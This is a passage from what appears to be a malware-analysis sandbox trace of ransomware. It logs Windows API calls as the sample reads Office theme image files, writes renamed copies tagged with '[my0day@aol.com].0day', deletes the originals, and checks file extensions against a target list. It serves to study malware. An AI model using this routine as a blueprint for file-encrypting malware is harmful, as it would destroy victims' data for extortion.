hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.986] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.986] SetEndOfFile (hFile=0x178) returned 1 [0045.987] CloseHandle (hObject=0x178) returned 1 [0045.987] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.987] SetEndOfFile (hFile=0x198) returned 1 [0045.988] CloseHandle (hObject=0x198) returned 1 [0045.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.988] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.989] lstrlenW (lpString=".doc") returned 4 [0045.989] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString=".docx") returned 5 [0045.989] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.989] lstrlenW (lpString=".pdf") returned 4 [0045.989] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString=".xls") returned 4 [0045.989] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.989] lstrlenW (lpString=".xlsx") returned 5 [0045.989] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.989] lstrlenW (lpString=".ppt") returned 4 [0045.989] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.989] lstrlenW (lpString=".zip") returned 4 [0045.989] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.989] lstrlenW (lpString=".rar") returned 4 [0045.989] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.989] lstrlenW (lpString=".bz2") returned 4 [0045.989] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString=".7z") returned 3 [0045.989] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.989] lstrlenW (lpString=".dbf") returned 4 [0045.989] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.989] lstrlenW (lpString=".1cd") returned 4 [0045.989] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.989] lstrlenW (lpString=".jpg") returned 4 [0045.989] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.990] lstrlenW (lpString=".doc") returned 4 [0045.990] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.990] lstrlenW (lpString=".docx") returned 5 [0045.990] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.990] lstrlenW (lpString=".pdf") returned 4 [0045.990] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.990] lstrlenW (lpString=".xls") returned 4 [0045.990] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.990] lstrlenW (lpString=".xlsx") returned 5 [0045.990] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.990] lstrlenW (lpString=".ppt") returned 4 [0045.990] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.990] lstrlenW (lpString=".zip") returned 4 [0045.990] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.990] lstrlenW (lpString=".rar") returned 4 [0045.990] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.990] lstrlenW (lpString=".bz2") returned 4 [0045.990] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.990] lstrlenW (lpString=".7z") returned 3 [0045.990] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.990] lstrlenW (lpString=".dbf") returned 4 [0045.990] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.990] lstrlenW (lpString=".1cd") returned 4 [0045.990] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0045.990] lstrlenW (lpString=".jpg") returned 4 [0045.990] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.990] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0045.991] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.991] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.991] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1659) returned 1 [0045.991] CloseHandle (hObject=0x198) returned 1 [0045.991] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 0x20 [0045.991] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.991] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.991] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.991] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.991] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.993] GetLastError () returned 0x0 [0045.993] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x67b, lpOverlapped=0x0) returned 1 [0045.995] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x680, lpOverlapped=0x0) returned 1 [0045.996] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.996] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.996] SetEndOfFile (hFile=0x178) returned 1 [0045.996] CloseHandle (hObject=0x178) returned 1 [0045.996] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.996] SetEndOfFile (hFile=0x198) returned 1 [0045.997] CloseHandle (hObject=0x198) returned 1 [0045.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.997] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 1 [0045.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.997] lstrlenW (lpString=".doc") returned 4 [0045.997] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.997] lstrlenW (lpString=".docx") returned 5 [0045.997] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.997] lstrlenW (lpString=".pdf") returned 4 [0045.997] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.997] lstrlenW (lpString=".xls") returned 4 [0045.997] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.997] lstrlenW (lpString=".xlsx") returned 5 [0045.998] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.998] lstrlenW (lpString=".ppt") returned 4 [0045.998] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.998] lstrlenW (lpString=".zip") returned 4 [0045.998] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString=".rar") returned 4 [0045.998] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString=".bz2") returned 4 [0045.998] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.998] lstrlenW (lpString=".7z") returned 3 [0045.998] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.998] lstrlenW (lpString=".dbf") returned 4 [0045.998] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.998] lstrlenW (lpString=".1cd") returned 4 [0045.998] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.998] lstrlenW (lpString=".jpg") returned 4 [0045.998] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.998] lstrlenW (lpString=".doc") returned 4 [0045.998] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.998] lstrlenW (lpString=".docx") returned 5 [0045.998] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.998] lstrlenW (lpString=".pdf") returned 4 [0045.998] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString=".xls") returned 4 [0045.998] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString=".xlsx") returned 5 [0045.998] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.999] lstrlenW (lpString=".ppt") returned 4 [0045.999] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.999] lstrlenW (lpString=".zip") returned 4 [0045.999] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.999] lstrlenW (lpString=".rar") returned 4 [0045.999] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.999] lstrlenW (lpString=".bz2") returned 4 [0045.999] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.999] lstrlenW (lpString=".7z") returned 3 [0045.999] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.999] lstrlenW (lpString=".dbf") returned 4 [0045.999] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.999] lstrlenW (lpString=".1cd") returned 4 [0045.999] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.999] lstrlenW (lpString=".jpg") returned 4 [0045.999] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.999] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.999] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.000] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=44850) returned 1 [0046.001] CloseHandle (hObject=0x198) returned 1 [0046.001] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 0x20 [0046.001] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.001] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.001] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.001] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.001] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0046.001] GetLastError () returned 0x0 [0046.001] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xaf32, lpOverlapped=0x0) returned 1 [0046.004] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xaf40, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xaf40, lpOverlapped=0x0) returned 1 [0046.007] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.007] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.008] SetEndOfFile (hFile=0x178) returned 1 [0046.008] CloseHandle (hObject=0x178) returned 1 [0046.008] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.008] SetEndOfFile (hFile=0x198) returned 1 [0046.009] CloseHandle (hObject=0x198) returned 1 [0046.009] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.009] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 1 [0046.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.009] lstrlenW (lpString=".doc") returned 4 [0046.009] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.009] lstrlenW (lpString=".docx") returned 5 [0046.010] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.010] lstrlenW (lpString=".pdf") returned 4 [0046.010] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.010] lstrlenW (lpString=".xls") returned 4 [0046.010] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.010] lstrlenW (lpString=".xlsx") returned 5 [0046.010] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.010] lstrlenW (lpString=".ppt") returned 4 [0046.010] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.010] lstrlenW (lpString=".zip") returned 4 [0046.010] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.010] lstrlenW (lpString=".rar") returned 4 [0046.010] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.010] lstrlenW (lpString=".bz2") returned 4 [0046.010] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.010] lstrlenW (lpString=".7z") returned 3 [0046.010] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.010] lstrlenW (lpString=".dbf") returned 4 [0046.010] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.010] lstrlenW (lpString=".1cd") returned 4 [0046.010] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.010] lstrlenW (lpString=".jpg") returned 4 [0046.010] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.010] lstrlenW (lpString=".doc") returned 4 [0046.010] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.010] lstrlenW (lpString=".docx") returned 5 [0046.010] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.011] lstrlenW (lpString=".pdf") returned 4 [0046.011] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.011] lstrlenW (lpString=".xls") returned 4 [0046.011] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.011] lstrlenW (lpString=".xlsx") returned 5 [0046.011] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.011] lstrlenW (lpString=".ppt") returned 4 [0046.011] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.011] lstrlenW (lpString=".zip") returned 4 [0046.011] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.011] lstrlenW (lpString=".rar") returned 4 [0046.011] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.011] lstrlenW (lpString=".bz2") returned 4 [0046.011] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.011] lstrlenW (lpString=".7z") returned 3 [0046.011] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.011] lstrlenW (lpString=".dbf") returned 4 [0046.011] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.011] lstrlenW (lpString=".1cd") returned 4 [0046.011] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0046.011] lstrlenW (lpString=".jpg") returned 4 [0046.011] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.011] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.011] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.012] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1379) returned 1 [0046.012] CloseHandle (hObject=0x198) returned 1 [0046.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 0x20 [0046.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.012] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.012] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0046.014] GetLastError () returned 0x0 [0046.014] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x563, lpOverlapped=0x0) returned 1 [0046.015] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x570, lpOverlapped=0x0) returned 1 [0046.017] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, 